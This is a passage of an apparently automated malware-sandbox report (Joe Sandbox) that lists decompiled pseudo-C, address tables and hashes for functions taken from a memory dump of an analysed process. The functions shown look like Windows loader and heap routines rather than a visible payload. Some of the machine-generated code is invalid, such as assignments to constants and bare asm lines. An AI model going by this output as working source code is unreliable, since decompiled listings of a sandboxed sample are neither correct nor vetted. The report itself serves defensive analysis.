													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x38b7b08 =  *0x38b7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E038057C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0380F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L037E77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E037FA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L037E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E038096C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x037d849b
0x037d849b
0x037d849b
0x037d849b
0x037d849d
0x037d84a2
0x037d84a7
0x037d84b1
0x037d84d8
0x00000000
0x037d84b3
0x037d84c4
0x037d84c9
0x037d84cd
0x037d84cf
0x037d84cf
0x037d84d6
0x037d84e6
0x037d84e9
0x037d84ec
0x037d84ef
0x037d84f2
0x037d84f4
0x037d84fc
0x037d8501
0x037d8506
0x037d8509
0x037d86e0
0x037d86e5
0x037d86e8
0x037d86ed
0x037d86f0
0x037d86f2
0x03829afd
0x03829b02
0x037d84da
0x037d84df
0x037d84df
0x037d86fa
0x037d86fd
0x037d86fe
0x037d8701
0x037d8706
0x037d8709
0x037d870b
0x00000000
0x00000000
0x037d8711
0x037d8725
0x037d8727
0x037d872a
0x037d872c
0x03829af0
0x03829af5
0x037d8732
0x037d8732
0x037d8732
0x037d8735
0x037d8737
0x037d8515
0x037d8515
0x037d8518
0x037d851d
0x037d8523
0x037d8527
0x037d852b
0x037d8537
0x037d8539
0x037d853c
0x037d853e
0x037d868c
0x037d8691
0x037d8699
0x037d869b
0x037d8744
0x037d8748
0x037d86a1
0x037d86a1
0x037d86a1
0x037d86a4
0x037d86a8
0x03829bdf
0x03829bdf
0x037d86ae
0x037d86b0
0x00000000
0x037d86b6
0x00000000
0x03829be9
0x037d86b0
0x037d8544
0x037d854a
0x037d854d
0x037d8551
0x037d876e
0x037d8778
0x037d877b
0x037d8780
0x037d8557
0x037d8557
0x037d855d
0x037d855d
0x037d856b
0x037d856e
0x037d8570
0x037d8573
0x037d8576
0x037d8576
0x037d8579
0x037d857b
0x00000000
0x00000000
0x037d8581
0x037d85a0
0x037d85a2
0x037d85a5
0x037d85a7
0x03829b1b
0x03829b1b
0x037d862e
0x037d862e
0x037d8631
0x037d8631
0x037d8634
0x037d8636
0x037d8669
0x037d8669
0x037d866b
0x03829bbf
0x03829bc4
0x03829bc8
0x03829bce
0x03829bce
0x037d8671
0x037d8671
0x037d8674
0x037d8676
0x03829bae
0x03829bae
0x037d8676
0x037d867c
0x037d867e
0x037d8688
0x037d8688
0x00000000
0x037d867e
0x037d8638
0x037d8638
0x037d863b
0x037d863e
0x037d863f
0x037d8642
0x037d8645
0x037d8648
0x037d864d
0x03829b69
0x03829b6e
0x03829b7b
0x03829b81
0x03829b85
0x03829b89
0x03829ba7
0x03829b8b
0x03829b91
0x03829b9a
0x03829b9f
0x03829b9f
0x037d8788
0x037d878d
0x037d8763
0x037d8763
0x037d8766
0x00000000
0x037d8766
0x03829b70
0x00000000
0x03829b70
0x037d8656
0x037d865a
0x037d865c
0x037d8752
0x037d8756
0x00000000
0x00000000
0x037d875e
0x00000000
0x037d875e
0x037d8662
0x037d8662
0x037d8662
0x037d8666
0x00000000
0x037d8666
0x037d85b7
0x037d85b9
0x037d85bc
0x037d85bf
0x037d85cc
0x037d85d1
0x037d85d4
0x037d85db
0x037d85de
0x037d85e0
0x03829b5f
0x00000000
0x03829b5f
0x037d85e6
0x037d85ea
0x037d86c3
0x037d86c5
0x037d86c8
0x037d86ca
0x03829b16
0x00000000
0x03829b16
0x037d86d6
0x037d85f6
0x037d85f6
0x037d85f9
0x037d8602
0x037d8606
0x037d860a
0x037d860b
0x037d860e
0x037d8611
0x00000000
0x037d8611
0x037d85f3
0x00000000
0x037d85f3
0x037d8619
0x037d861e
0x037d861e
0x037d8621
0x037d8622
0x037d8623
0x037d8625
0x037d862c
0x00000000
0x037d873d
0x00000000
0x037d873d
0x037d8737
0x037d850f
0x037d8512
0x00000000
0x037d8512
0x00000000
0x037d84d6

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c17897d72892ab2c4f5bd2605cd9fc7a9bd6d4b2abb2dcdfed31bc53c795ce53
Instruction ID: 8feeb1aa1b3a7ac1a656abcd56ab054a279674d53cfa03a6351dd9f964e07221
Opcode Fuzzy Hash: c17897d72892ab2c4f5bd2605cd9fc7a9bd6d4b2abb2dcdfed31bc53c795ce53
Instruction Fuzzy Hash: 9EB169B4E00359EFCB18DFE9C984AADBBB9BF48314F14416AE405AB346D770A941CF51

Uniqueness

Uniqueness Score: -1.00%

Function 037F513A Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E037F513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x38bd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0380D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E037E2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L037E4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0380F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E037DFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x38bb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0380B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x037f5142
0x037f514c
0x037f5150
0x037f5157
0x037f5159
0x037f515e
0x037f5165
0x037f5169
0x037f516c
0x037f5172
0x037f5176
0x037f517a
0x037f517a
0x037f517a
0x037f517f
0x03836d8b
0x03836d8e
0x03836d91
0x03836d95
0x03836d98
0x03836d9c
0x03836da0
0x03836da3
0x03836da7
0x03836e26
0x03836e26
0x03836e2a
0x037f51f9
0x037f51f9
0x037f51fe
0x03836e33
0x03836e33
0x03836e39
0x03836e3d
0x03836e46
0x03836e50
0x00000000
0x00000000
0x03836e52
0x03836e53
0x03836e56
0x03836e5d
0x00000000
0x00000000
0x00000000
0x03836e5f
0x03836e67
0x03836e77
0x03836e7f
0x03836e80
0x03836e88
0x03836e90
0x03836e9f
0x03836ea5
0x03836ea9
0x03836eb1
0x03836ebf
0x00000000
0x00000000
0x03836ecf
0x03836ed3
0x00000000
0x00000000
0x03836edb
0x03836ede
0x03836ee1
0x03836ee8
0x03836eeb
0x03836eed
0x03836ef0
0x03836ef4
0x03836ef8
0x03836efc
0x00000000
0x00000000
0x03836f0d
0x03836f11
0x03836f32
0x03836f37
0x03836f3b
0x03836f3e
0x03836f41
0x03836f46
0x00000000
0x00000000
0x03836f4c
0x03836f50
0x03836f50
0x03836f54
0x03836f62
0x03836f65
0x03836f6d
0x03836f7b
0x03836f7b
0x03836f93
0x03836f98
0x03836fa0
0x03836fa6
0x03836fb3
0x03836fb6
0x03836fbf
0x03836fc1
0x03836fd5
0x03836fda
0x03836fda
0x03836fdd
0x03836fe2
0x03836fe7
0x03836feb
0x03836fef
0x03836ff3
0x037f520c
0x037f520c
0x037f520f
0x037f5215
0x037f5234
0x037f523a
0x037f523a
0x037f5244
0x037f5245
0x037f5246
0x037f5251
0x037f5251
0x03836f13
0x03836f17
0x03836f17
0x03836f18
0x03836f1b
0x03836f1f
0x03836f23
0x00000000
0x03836f28
0x037f5204
0x037f5204
0x037f5208
0x00000000
0x037f5208
0x037f5185
0x037f5188
0x037f518a
0x037f518e
0x037f5195
0x03836db1
0x03836db5
0x03836db9
0x037f519b
0x037f519b
0x037f519e
0x037f51a7
0x037f51a9
0x037f51a9
0x037f51b5
0x037f51b8
0x037f51bb
0x037f51be
0x037f51c1
0x037f51c5
0x037f51c9
0x037f51cd
0x037f51cd
0x037f51d8
0x037f51dc
0x037f51e0
0x03836dcc
0x03836dd0
0x03836dd5
0x03836ddd
0x03836de1
0x03836de1
0x03836de5
0x03836deb
0x03836df1
0x03836df7
0x03836dfd
0x03836e01
0x03836e05
0x03836e09
0x03836e0d
0x03836e11
0x03836e11
0x037f51eb
0x03836e1a
0x03836e1f
0x03836e21
0x03836e23
0x00000000
0x037f51f1
0x037f51f1
0x00000000
0x037f51f1

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fd247fc65c28babe92f7281aa543798e5d4f9c888fa06f8822a005f4bf9d0cf
Instruction ID: 88a2b96bbbb5ae4fd44d00a117ad9b06ef63a31d5f43d2ec6ff00ebf070b7a87
Opcode Fuzzy Hash: 4fd247fc65c28babe92f7281aa543798e5d4f9c888fa06f8822a005f4bf9d0cf
Instruction Fuzzy Hash: 88C143755093809FD354CF68C480A6AFBF1BF89314F184AAEF9998B352D771E845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 037F03E2 Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E037F03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x38bd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E037F0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0380B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E037DB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x38b7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E037E7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E037E7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E03847016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03809830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E038469A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x38b7c04 != 0) {
						_t118 = _v12;
						_t120 = E0384A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x38b7bd8;
						if( *0x38b7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E038095D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E038099A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E03843540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E037CB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0380AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x38b8474 - 3;
										if( *0x38b8474 != 3) {
											 *0x38b79dc =  *0x38b79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E037E7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E037E7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E03847016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x38b8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x38b7b00; // 0x0
							asm("ror esi, cl");
							 *0x38bb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E038095D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E037D7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x037f03f1
0x037f03f7
0x037f03f9
0x037f03fb
0x037f03fd
0x037f0400
0x037f040a
0x03834c7a
0x037f0537
0x037f0547
0x037f0410
0x037f0410
0x037f0414
0x037f0417
0x037f041a
0x037f0421
0x037f0424
0x037f042b
0x037f043b
0x037f043e
0x037f043f
0x037f043f
0x037f0446
0x037f0449
0x037f044c
0x037f044f
0x037f0459
0x03834c8d
0x037f045f
0x037f045f
0x037f045f
0x037f0467
0x03834c97
0x03834c9d
0x03834ca4
0x03834caa
0x03834caf
0x03834cb1
0x03834cc3
0x03834cb3
0x03834cbc
0x03834cbc
0x03834cc8
0x03834ccb
0x03834cd7
0x03834cda
0x03834cdf
0x03834cdf
0x03834ccb
0x03834ca4
0x037f046d
0x037f046f
0x037f046f
0x037f0471
0x037f0476
0x037f047a
0x037f047b
0x037f0483
0x037f0489
0x037f048d
0x00000000
0x00000000
0x03834ce9
0x03834cef
0x03834d22
0x03834d22
0x00000000
0x03834d22
0x03834cf1
0x03834cf7
0x00000000
0x00000000
0x03834cf9
0x03834cff
0x00000000
0x00000000
0x03834d05
0x03834d07
0x00000000
0x00000000
0x03834d0d
0x03834d0f
0x03834d14
0x03834d16
0x00000000
0x00000000
0x03834d1c
0x03834d1c
0x037f0499
0x037f0535
0x037f0535
0x00000000
0x037f0535
0x037f04a6
0x03834d2c
0x03834d37
0x03834d39
0x03834d3b
0x00000000
0x00000000
0x03834d41
0x03834d48
0x037f0527
0x037f052b
0x037f052d
0x037f0530
0x037f0530
0x00000000
0x037f052b
0x03834d4e
0x037f04ac
0x037f04ac
0x037f04af
0x037f04b2
0x037f04b7
0x037f04b9
0x037f04bb
0x037f04bd
0x037f04bf
0x037f04c5
0x037f04c9
0x03834d53
0x03834d59
0x03834db9
0x03834dba
0x03834dbf
0x03834dc2
0x03834dc4
0x03834dc7
0x03834dce
0x00000000
0x03834dce
0x03834d5b
0x03834d61
0x00000000
0x00000000
0x03834d63
0x03834d69
0x00000000
0x00000000
0x03834d6b
0x03834d6e
0x03834d74
0x03834d76
0x03834d7c
0x03834d7e
0x03834d84
0x03834d89
0x03834d8c
0x03834d8d
0x03834d92
0x03834d95
0x03834d96
0x03834d98
0x03834d9a
0x03834d9f
0x03834da4
0x03834da6
0x03834da8
0x03834daf
0x03834db1
0x03834db1
0x03834daf
0x03834da6
0x03834d84
0x03834d7c
0x00000000
0x03834d74
0x037f04d6
0x03834de1
0x037f04dc
0x037f04dc
0x037f04dc
0x037f04e4
0x03834deb
0x03834df1
0x03834df8
0x03834dfe
0x03834e03
0x03834e05
0x03834e17
0x03834e07
0x03834e10
0x03834e10
0x03834e1c
0x03834e1f
0x03834e35
0x03834e35
0x03834e1f
0x03834df8
0x037f04f1
0x037f04fa
0x03834e3f
0x03834e47
0x03834e5b
0x03834e61
0x03834e67
0x03834e69
0x03834e71
0x03834e73
0x037f0500
0x037f0500
0x037f0500
0x037f04fa
0x037f0508
0x037f051d
0x037f051d
0x037f051f
0x037f0524
0x00000000
0x037f0524
0x037f0515
0x037f0517
0x03834e7a
0x03834e7c
0x00000000
0x00000000
0x03834e85
0x00000000
0x03834e85
0x00000000
0x037f0517

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 524cc8c18848486665d8f37091b51981b64b953edc5c3d23b6c80a4b0de781b7
Instruction ID: 149d6a89bfaf1c752810cbd8ee02bdf74afe858b1b28fd5c5409f830ae22fa5c
Opcode Fuzzy Hash: 524cc8c18848486665d8f37091b51981b64b953edc5c3d23b6c80a4b0de781b7
Instruction Fuzzy Hash: 2A91F575E007599FDB21DAA9C844BBDBBA4BB06724F0902E5EA11EB3D1D7749D00C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 037CC600 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E037CC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x38bd360 ^ _t125;
				_t116 = _a4;
